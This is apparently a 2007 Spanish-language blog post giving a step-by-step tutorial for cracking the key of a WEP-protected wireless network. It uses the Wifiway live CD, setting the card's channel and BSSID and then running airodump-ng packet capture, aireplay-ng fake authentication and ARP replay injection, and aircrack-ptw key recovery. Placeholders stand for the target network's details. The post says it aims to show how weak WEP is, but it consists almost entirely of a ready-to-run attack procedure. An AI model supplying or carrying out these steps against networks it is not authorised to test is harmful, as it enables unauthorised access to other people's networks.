martes, 7 de agosto de 2007

Cracker redes con contraseña wep

Bueno pues el tutorial de hoy es para demostraros lo frágiles que son las redes con protección wep.

Lo primero de todo es descargar la distribución de aquí, la distribución es wifiway y la ventaja que tiene con respecto a otras distribuciones (Wifislax, Whoppix ) es que esta tiene inyección desde ipw3945.

Arrancamos la distribución siempre contando con que tenga el boot desde cd activo.

Los pasos a seguir son:

Primer bloque:
  1. airodump-ng rtap0 (podemos ejecutar esto para ver todos los datos que nos hacen falta)
  2. ifconfig wifi0 down
  3. chmod u+wrx /sys/class/net/wifi0/device/channel
  4. echo !canal! > /sys/class/net/wifi0/device/channel
  5. echo 2 > /sys/class/net/wifi0/device/rate
  6. echo !mac_del_ap! > /sys/class/net/wifi0/device/bssid
  7. ifconfig wifi0 up
Segundo bloque:
  1. airodump-ng -w !nombre_del_archivo! -c !canal! rtap0
  2. aireplay-ng -1 0 -e !nombre_del_ap! -a !mac_del_ap! -h !mi_mac! wifi0
  3. aireplay-ng -3 -b !mac_del_ap! -h !mi_mac! wifi0
  4. aircrack-ptw !archivo.cap!
Variables
  • !canal! --> Su propio nombre lo indica, hay que buscar el canal en el que emite el ap.
  • !nombre_del_archivo! --> El nombre con el que queremos crear el archivo.
  • !nombre_del_ap! --> Pues eso el nombre que tenga al ap.
  • !mac_del_ap! --> La mac del ap es la primera columna que nos aparece en el airodump.
  • !mi_mac! --> nuestra mac, si no la sabemos, ifconfig wifi0 y donde pone hardw los seis primeros pares.
  • !archivo.cap! --> el nombre con el que hemos guardado antes terminado en .cap (consejo, escribir el nombre y tabular para que os aparezcan todos los archivos, ya que, airodump los numero estomáticamente)
P.D.
Para más ayuda os recomiendo que os paséis por www.seguridadwireless.net

Un saludo. Denos.

No hay comentarios: